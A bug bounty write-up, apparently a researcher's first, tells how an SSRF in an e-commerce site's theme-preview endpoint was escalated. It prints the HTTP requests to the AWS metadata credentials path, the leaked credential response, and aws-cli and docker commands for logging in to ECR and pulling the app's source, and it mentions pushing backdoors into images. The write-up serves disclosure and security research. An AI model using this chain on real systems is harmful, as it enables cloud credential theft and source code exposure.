.png)
1 week ago
30 BOOK THIS SPACE FOR AD
ARTICLE AD
Hello Guys,
My name is Yazeed Bilal and I started bug hunting since I was 16 y.o, and this is my first bug bounty write-up.
I will explain for you how I’ve succeeded to Elevate P3 SSRF to P1
at the first what is SSRF , SSRF is web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location
So I’ve found this vulnerability in eCommerce website similar of Shopify and it’s have all features just like Shopify.
Ok, sorry ….
and When I was researching in this web-app and inspect every request I’ve found this request :
POST /themes/advance/get-preview/0 HTTP/2Host: redacted.com
Cookie: REDACTED
User-Agent: REDACTED
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
preview_url=https://urlpreviewforyourshop.redacted.com/
this endpoint used to preview your website theme to edit it
hmm…, then first thing you will do when you see this it will be change the domain or URL and check if this endpoint vulnerable to SSRF
and this is what I’ve did :)
I’ve copied the Collaborator URL and paste it and BOOM I’ve got response from oastify Collaborator
<html><body>1cyz7itbpg9qacr5xm2zlrzjjgjogz</body></html>I’ve tested if I can read local files using file: protocol but didn’t succeed
now I’ll test if I can escalate it and get response from AWS metadata
Request body :
POST /themes/advance/get-preview/0 HTTP/2Host: redacted.com
Cookie: REDACTED
User-Agent: REDACTED
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
preview_url=http://169.254.169.254/latest/meta-data/iam/security-credentials/redacted-prod-node
Response :
HTTP/2 200 OKDate: Tue, 21 Jan 2025 03:33:39 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, private
X-Frame-Options: SAMEORIGIN
Cf-Cache-Status: DYNAMIC
Server: nginx
Alt-Svc: h3=":8080"; ma=76400
{
"Code" : "Success",
"LastUpdated" : "2025-01-21T03:23:50Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "SECRET",
"SecretAccessKey" : "SECRET",
"Token" : "IQoJb3JpZ2luX2VjELv//////////wE.........................AYgwVv9Z2AA97YaSU2yEDWO7X3qvvXJzBvLQbTz4OixLWGitd3oCsFh5rbF5Dd2w0giEKbT2Ux4G7S0dC62yqPvgfcy7",
"Expiration" : "2025-01-21T09:40:14Z"
}
Ok, so now , I will enumerate and see what allowed privileges I can access to with this Credentials so I used this tool to enumerate AWS credentials privileges:
but Unfortunately, this credentials just helped me to get information data and not have any impact , even S3 was not included with this IAM credentials, but I’ve found something when re-enumerate IAM privileges was called ECR (Elastic Container Registry) so I’ve make some researches and I’ve realized that AWS ECR using docker to scan aws ec2 images for software bugs or vulnerabilities
output of enumerate-iam.py :
........ecr.get_login_password worked()
...........
it’s time to check if credentials usable in aws-cli :
$ export AWS_ACCESS_KEY_ID="[AccessKeyId]"$ export AWS_SECRET_ACCESS_KEY="[SecretAccessKey]"
$ export AWS_DEFAULT_REGION="[region]"
$ export AWS_SESSION_TOKEN="[Token]"$ aws ecr describe-repositories
output example:
{"repositories": [
{
"registryId": "012345678910",
"repositoryName": "ubuntu",
"repositoryArn": "arn:aws:ecr:us-west-2:012345678910:repository/ubuntu"
},
{
"registryId": "012345678910",
"repositoryName": "test",
"repositoryArn": "arn:aws:ecr:us-west-2:012345678910:repository/test"
}
]
}
and now lets login to docker via aws ecr docker credentials (ecr.get-login-password)
aws ecr get-login-password --region <region> | docker login --username AWS --password-stdin <account ID>.dkr.ecr.<region>.amazonaws.comand now we successfully logged in to docker.
now we can access to all docker repository data (WEB-APP source code)
$ docker pull <account ID>.dkr.ecr.<region>.amazonaws.com/<repository name>:vulnerable..................
..................
..................
..................
..................
$ docker run <account ID>.dkr.ecr.<region>.amazonaws.com/<repository name>:vulnerable ls -la
now we have web-app source code so we can get all api keys and secrets including DB credentials aws S3 credentials configs and endpoints …..
abusing aws ecr have another impacts if we used docker to push malicious codes inside repository layers then we can have backdoor or reverse shell in employees workstation devices and main web-app servers
Program : External
Bounty : $3K
and that’s all :)
Thanks
Bengali (Bangladesh) · 
English (United States) ·